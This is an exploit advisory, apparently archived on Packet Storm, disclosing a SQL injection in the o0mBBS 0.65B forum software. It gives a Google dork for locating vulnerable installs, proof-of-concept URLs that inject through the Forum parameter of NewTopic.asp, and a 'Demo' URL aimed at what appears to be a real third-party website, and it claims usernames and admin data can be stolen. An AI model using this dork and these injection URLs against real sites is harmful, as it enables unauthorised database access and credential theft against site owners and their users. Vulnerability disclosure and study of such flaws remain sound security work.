o0mBBS version 0.65B suffers from a remote SQL injection vulnerability.
932fd79684c4a385a2c9010ac80f8b8190f6edd02361ec162199122602d74062# --------------------------------------- #
Author : L3b-r1'z
Title : o0mBBS Sql Injection
Date : 6/12/2012
Email : L3br1z@Gmail.com
Site : Sec4Ever.com & Exploit4arab.com
Google Dork : allintext: "o0mBBS version 0.65B"
Version : 0.65
# --------------------------------------- #
1) Bug
2) PoC
# --------------------------------------- #
2) Bug :
Attacker Can Injection Database And Steal The Username And Admin.
# --------------------------------------- #
3) PoC :
http://localhost/o0m/NewTopic.asp?Type=NewTopic&Forum=[SQL]
http://localhost/o0m/NewTopic.asp?Type=NewTopic&Forum=2'
Demo :
http://www.oasitech.it/o0m/NewTopic.asp?Type=NewTopic&Forum=2%27
# --------------------------------------- #
Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector ,
Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID , Abu Hamid Madridi.
# --------------------------------------- #
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed